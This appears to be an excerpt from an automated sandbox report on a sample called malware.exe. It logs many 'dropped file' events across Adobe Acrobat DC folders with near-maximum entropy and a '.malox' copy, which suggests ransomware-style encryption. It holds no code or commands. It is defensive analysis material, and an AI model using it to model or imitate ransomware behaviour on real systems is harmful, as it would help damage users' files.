        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak entropy: 7.9997513864Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak entropy: 7.99969381384Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak entropy: 7.9976021148Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html entropy: 7.99338524065Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html entropy: 7.99268154037Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf entropy: 7.99700564013Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf entropy: 7.99792478156Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf entropy: 7.99779020898Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html entropy: 7.99306651016Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html entropy: 7.99558178981Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html entropy: 7.9931941976Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf entropy: 7.99245328814Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\resources.pak entropy: 7.99854631652Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html entropy: 7.99515505948Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html entropy: 7.99329463648Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html entropy: 7.99506660185Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html entropy: 7.99430126037Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html entropy: 7.99450655421Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html entropy: 7.99561632065Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html entropy: 7.99334403659Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html entropy: 7.99428475059Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html entropy: 7.99473475092Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html entropy: 7.99418343541Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html entropy: 7.99336545322Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html entropy: 7.99471711796Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html entropy: 7.99392668806Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html entropy: 7.99667484808Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html entropy: 7.99429738856Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html entropy: 7.99412969386Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html entropy: 7.99307505622Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html entropy: 7.99422310801Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html entropy: 7.99429729694Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html entropy: 7.99508380034Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html entropy: 7.9949341213Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html entropy: 7.99470922005Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf entropy: 7.99777011391Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff entropy: 7.99872736152Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot entropy: 7.99553589897Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff entropy: 7.99865502338Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff entropy: 7.99874903417Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot entropy: 7.99591522334Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html entropy: 7.99108604624Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot entropy: 7.99661916452Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html entropy: 7.99121568733Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html entropy: 7.99613776134Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html entropy: 7.99385536376Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Accessibility.api entropy: 7.99746735767Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\AdobePDF417.pmp entropy: 7.99841424748Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc entropy: 7.99593814185Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf entropy: 7.99814657153Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf entropy: 7.99206358094Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\QRCode.pmp entropy: 7.99744708552Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DropboxStorage.api entropy: 7.99761598615Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf entropy: 7.99845970736Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf entropy: 7.99713972851Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf entropy: 7.99589509969Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf entropy: 7.99472369475Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\eBook.api entropy: 7.99742518509Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf entropy: 7.99683879114Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DVA.api entropy: 7.99527602081Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\IA32.api entropy: 7.99754669906Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf entropy: 7.99504729663Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\PDDom.api entropy: 7.99705164311Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\WindowsMedia.mpp entropy: 7.99067411157Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\MSRMS.api entropy: 7.9982678814Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\Flash.mpp entropy: 7.99082326279Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\reflow.api entropy: 7.9954140414Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\ReadOutLoud.api entropy: 7.99449891895Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvSOFT.x3d entropy: 7.99721659646Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\2d.x3d entropy: 7.99754935429Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\weblink.api entropy: 7.99747619607Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Updater.api entropy: 7.99603878784Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\StorageConnectors.api entropy: 7.99794366705Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Spelling.api entropy: 7.99795418923Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SendMail.api entropy: 7.99830777358Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Search.api entropy: 7.99734493673Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SaveAsRTF.api entropy: 7.99789760008Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvDX9.x3d entropy: 7.99778598268Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\3difr.x3d entropy: 7.99732581156Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\179f135ab98d015965571a3d585f8c8f.png entropy: 7.99738076558Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-app-launcher.js entropy: 7.99823445562Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Comments.aapp entropy: 7.99177549965Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\Microsoft.VCLibs.x86.14.00.appx entropy: 7.99966125643Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\tesselate.x3d entropy: 7.99515093983Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\MyriadCAD.otf entropy: 7.99764789605Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\04ddbdff6396d98807bc0b6a4af1938c.png entropy: 7.99052809408Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4109-chunk.js entropy: 7.99355163511Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4049-chunk.js entropy: 7.99734151725Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\3379-chunk.js entropy: 7.99583949752Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\0c9bbbe7a01f43c8a2c084d4926a8785.png entropy: 7.99899791022Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\229192ba6f3c6a8d242464d646d4ad63.png entropy: 7.99141687204Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1911-chunk.js entropy: 7.99572233041Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1901-chunk.js entropy: 7.99157723928Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6b0215ed0a09075330a1c6dd3dbfba1d.png entropy: 7.99059549747Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6823bdac587ae224bf36689600281a69.png entropy: 7.99171681974Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6297-chunk.js entropy: 7.99806669129Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6665-chunk.js entropy: 7.99271967959Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\57686c0e32e1983d524fb6f8d46ca8c7.png entropy: 7.99932704545Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\5251-chunk.js entropy: 7.99237329123Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4dddbe6058a486f7048673e4b143f7c4.png entropy: 7.99229205797Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\92bfb68adb54a6ec950196b4d39ccf3e.png entropy: 7.99429074797Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9488-chunk.js entropy: 7.99125324053Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9216-chunk.js entropy: 7.99530160842Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8329-chunk.js entropy: 7.99616347196Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8172-chunk.js entropy: 7.99675123613Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7ec969a62598fbfa1ee1eb8827a0f2e5.png entropy: 7.99857631336Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6f43d8c6da907e34ab2028ef15733412.png entropy: 7.99967524598Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7363-chunk.js entropy: 7.99744192024Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7279-chunk.js entropy: 7.99794410659Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99412230896Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\db3460ac8568d0137d4556570169e475.png entropy: 7.99629837079Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c124efa99176e538252a2ae3cef2137e.png entropy: 7.99941070661Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\a56350ec5a5b310e9f4c7e10e0b6795c.png entropy: 7.99942050734Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b961cde276c90015f1db51975a470747.png entropy: 7.99066489345Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b99178ba996d2b4a255b0f163dcb88ce.png entropy: 7.9974020421Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9b1662bee64658ff8dd184737a056510.png entropy: 7.99770100696Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\83bf4cfa63b712c6973a0d510a7b2c99.png entropy: 7.99938251273Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9066745ff44b689b5cc89c3d73970f01.png entropy: 7.99868811979Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8479-chunk.js entropy: 7.99487126685Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccx-chunk.js entropy: 7.99685610479Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccxfeedback-popups-chunk.js entropy: 7.99273909941Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\dc3b5d449449a5103f90189b239c0bf6.png entropy: 7.99823472919Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c6534465ea418b6c252e2b74bc9e4bbb.png entropy: 7.99936835281Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\ui-strings.js entropy: 7.99031102421Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js entropy: 7.99238074037Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js entropy: 7.9909208044Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\ui-strings.js entropy: 7.99163966207Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js entropy: 7.99082717234Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js entropy: 7.99089692411Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js entropy: 7.99159294666Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\ui-strings.js entropy: 7.99012275917Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\upgrade_top_image2x.png entropy: 7.99958112738Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js entropy: 7.99103123965Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\ui-strings.js entropy: 7.9933900176Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js entropy: 7.99085074938Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js entropy: 7.99117969195Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js entropy: 7.99053831427Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.malox (copy) entropy: 7.99412230896Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeProcess Stats: CPU usage > 49%
        Source: malware.exe, 00000000.00000003.1646260310.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685614425.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685614425.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1785769862.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1813084478.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2247464482.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2182773970.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
